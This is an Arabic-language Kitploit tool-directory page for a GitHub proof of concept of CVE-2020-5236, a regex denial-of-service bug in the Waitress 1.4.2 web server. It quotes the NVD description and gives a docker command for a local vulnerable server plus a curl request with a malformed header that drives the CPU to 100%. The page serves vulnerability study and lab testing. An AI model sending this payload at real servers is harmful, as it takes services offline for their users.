Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-5236 — Waitress 1.4.2 ReDoS - CVE-2020-5236 (كود نموذجي من مدونة) | Kitploit
أدوات/GitHubGitHub/motikan2010/cve-2020-5236
تحليل الثغرات الأمنيةأمن الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubmotikan2010/cve-2020-5236

CVE-2020-5236

Waitress 1.4.2 ReDoS - CVE-2020-5236 (كود نموذجي من مدونة)

عرض المستودعالموقع الإلكتروني
421منذ 6 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Waitress 1.4.2 ReDoS - CVE-2020-5236

يتيح إصدار Waitress 1.4.2 شن هجوم حجب الخدمة (DoS). فعندما يستقبل Waitress ترويسة تحتوي على أحرف غير صالحة، مثل ترويسة بالشكل "Bad-header: xxxxxxxxxxxxxxx\x10"، فإن ذلك يؤدي إلى تراجع كارثي في محرك التعبير النمطي (regex)، ما يسبب استهلاك العملية 100% من زمن المعالج (CPU) وحجب أي تفاعلات أخرى. وهذا يسمح للمهاجم بإرسال طلب واحد يحمل ترويسة غير صالحة لإخراج الخدمة عن العمل.

بواسطة NVD

الاستخدام

تشغيل الخادم الضعيف

root@kitploit:~
$ docker run --rm --name waitress -v "$PWD/src:/src" -p "8080:8080" -it python:3.7-slim python /src/server.py

PoC

root@kitploit:~
$ curl "http://127.0.0.1:8080/hello/hogefuga" -H "Bad-header: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx`echo -n '\x10'`"

اعرض استخدام وحدة المعالجة المركزية (CPU) للخادم. نفّذ "docker stats waitress".
↓ نفّذ PoC



المراجع

  • NVD - CVE-2020-5236
  • التراجع الكارثي في التعبير النمطي يتيح حجب الخدمة · استشارة أمنية · Pylons/waitress
تنزيل الأداة